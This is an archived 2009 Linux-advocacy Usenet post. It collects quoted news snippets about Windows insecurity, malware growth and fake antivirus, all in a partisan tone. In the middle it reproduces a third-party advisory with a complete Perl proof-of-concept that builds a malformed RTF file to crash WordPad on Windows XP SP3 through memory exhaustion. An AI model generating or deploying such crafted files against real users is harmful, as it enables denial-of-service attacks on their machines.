[News] [Rival] Windows Ind-secure by Design (Deal with it), Wordpad.exe

Home	Messages Index
[Date Prev]	[Date Next]	[Thread Prev]	[Thread Next]
Author Index	Date Index	Thread Index
[News] [Rival] Windows Ind-secure by Design (Deal with it), Wordpad.exe Under Attack

Subject: [News] [Rival] Windows Ind-secure by Design (Deal with it), Wordpad.exe Under Attack
From: Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx>
Date: Thu, 13 Aug 2009 22:37:16 +0000
Newsgroups: comp.os.linux.advocacy
User-agent: KNode/0.10.9
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security is a process

,----[ Quote ]
| I often point out that Windows is insecure. It's so insecure, in fact, that 
| I, in all seriousness, propose that ISPs (Internet Service Providers) should  
| start forcing users to secure Windows-since neither users or Microsoft will 
| do the job, Windows PCs should be banned from the Internet. That said, 
| nothing, and I mean nothing is really secure.   
| 
| [...]
| 
| It doesn't work that way. Security is a process, it's not a product. Some 
| systems are more secure than others. Linux, as anyone who pays any attention 
| to security news knows, is a lot more secure than Windows. If we were talking 
| cars, Linux would be an Audi A4, the Mac, BMW 330 and Windows would be a 
| mid-70s Ford "Hit here to blow up" Pinto.    
`----

http://www.itworld.com/security/74446/security-process

Virus arms race primes malware numbers surge

,----[ Quote ]
| The amount of catalogued malware by Panda was 18 million in the 20 years from 
| the firm's foundation until the end of 2008. This figure increased 60 per 
| cent in just seven months to reach 30 million by 31 July 2009.  
`----

http://www.theregister.co.uk/2009/08/13/malware_arms_race/

http://www.hellcode.net/wordpad.txt

,----[ Quote ]
| Affected Software: 
| Microsoft Wordpad on Windows XP SP3
| 
| Description of Vulnerability:
| Microsoft Wordpad (on Windows XP SP3) contains a vulnerability that can allow 
| an attacker to cause a denial of service.  
| The vulnerability is due to a memory exhaustion error when a user tries to 
| view a malicious .RTF file.  
| An attacker can exploit the vulnerability by creating a malicious RTF file 
| that will allocate large amounts of  
| memory and cause a denial of service condition.
| 
| Vulnerable version:
| Windows XP SP3
| 
| Platform:
| Windows XP SP3
| 
| Solution:
| There is not a patch. Do not open untrusted files.
| 
| Credits:
| Discovered by murderkey, Hellcode Research.
| http://tcc.hellcode.net
| 
| Exploit:
| 
| #!/usr/bin/perl
| #Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
| #Works on WinXP SP3!
| #bug found by murderkey in Hellcode Labs.
| #exploit coded by karak0rsan aka musashi from Hellcode Labs
| #Hellcode Research | TCC
| #http://tcc.hellcode.net
| #just a fuckin' lame 0day bug for fun!
| 
| $file = "hellcoded.rtf";
| $header = 
| "\x7b\x5c\x72\x74\x66\x31\x5c\x61\x6e\x73\x69\x5c\x61\x6e\x73\x69\x63\x70\x67\x31\x32". 
| "\x35\x34\x5c\x64\x65\x66\x66\x30\x5c\x64\x65\x66\x6c\x61\x6e\x67\x31\x30\x35\x35\x7b".
| "\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c\x66\x73\x77\x69\x73\x73\x5c\x66".
| "\x63\x68\x61\x72\x73\x65\x74\x31\x36\x32\x7b\x5c\x2a\x5c\x66\x6e\x61\x6d\x65\x20\x41".
| "\x72\x69\x61\x6c\x3b\x7d\x41\x72\x69\x61\x6c\x20\x54\x55\x52\x3b\x7d\x7d\x0a\x7b\x5c".
| "\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20".
| "\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x31\x35\x3b\x7d\x5c\x76\x69\x65\x77\x6b\x69".
| "\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c\x66\x30\x5c\x66\x73\x32\x30";
| 
| $subheader
= "\x5c\x41\x41\x41\x41\x41\x5c\x41\x41\x41\x41\x5c\x70\x61\x72\x0a\x7d\x0a\x00";
| $ekheader = "\x5c\x70\x61\x72\x0a";
| $buffer = "A" x 578001;
| $buffer2 = "A" x 289000;
| $buffer3 = "A" x 18186;
| $buffer4 = "A" x 863973;
| $buffer5= "A" x 578000;
| $memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.
| $subheader;              
|     open(file, '>' . $file);
|     print file $memory;
|     close(file);
| print "File PoC exploit has created!\n"; 
| exit();
`----


Recent:

Benign security warnings have trained users to ignore them

,----[ Quote ]
| It should come as no surprise that most Internet users ignore security
| certificate warnings, but a new study examines just how severe this behavior
| is and why people do it. Hint: it's because legit websites cry wolf with SSL
| warnings on a regular basis.
`----

http://arstechnica.com/security/news/2009/07/benign-security-warnings-have-trained-users-to-ignore-them.ars


AVG temporarily blocked iTunes, labeling it malware

,----[ Quote ]
| AVG's free antivirus product temporarily blocked users from getting to iTunes
| late last week, detecting it as a Trojan, the company said on Monday.
|
| For about five hours on Friday starting around 4 p.m. PDT, AVG users couldn't
| access iTunes because of the false alarm.
`----

http://news.cnet.com/8301-27080_3-10296755-245.html


Report finds fake antivirus on the rise

,----[ Quote ]
| PandaLabs found 1,000 samples of fake antivirus software in the first quarter
| of 2008. In a year, that number had grown to 111,000. And in the second
| quarter of 2009, it reached 374,000, Luis Corrons, technical director of
| PandaLabs said in a recent interview.
`----

http://news.cnet.com/8301-27080_3-10298253-245.html


Are we too naive by believing that GNU/Linux is more secure by design?

,----[ Quote ]
| Now, there are people that say that it's just that GNU/Linux is less
| attractive to malware software because there are so few of us GNU/Linux
| users. I have always thought that this is crap but anyway....
|
| Now, think about the things that FLOSS developers get to do:
| - Crack encrypted DVDs
| - Allow for communication between Microsoft Windows hosts (with a twisted SMB
| protocol) and *NIX hosts before Microsoft (reluctantly... but with a lot of
| PR spin, as usual) released the documentation about it
| - Synchronize with iTunes
| - Running GNU/Linux on basically any piece of equipment worthy of running it
| (with or without support by the vendor).. and some others that aren't worthy
| but....
| - Brake every DRM mechanism ever built
`----

http://maratux.blogspot.com/2009/07/are-we-too-naive-by-believing-that.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkqElZwACgkQU4xAY3RXLo7OBQCcCqGPYEs37fQHxSwJB0tsSPl9
NAwAn10zceeTdVdQkzp9bzD5CXbnShY2
=I2SG
-----END PGP SIGNATURE-----
[Date Prev]	[Date Next]	[Thread Prev]	[Thread Next]
Author Index	Date Index	Thread Index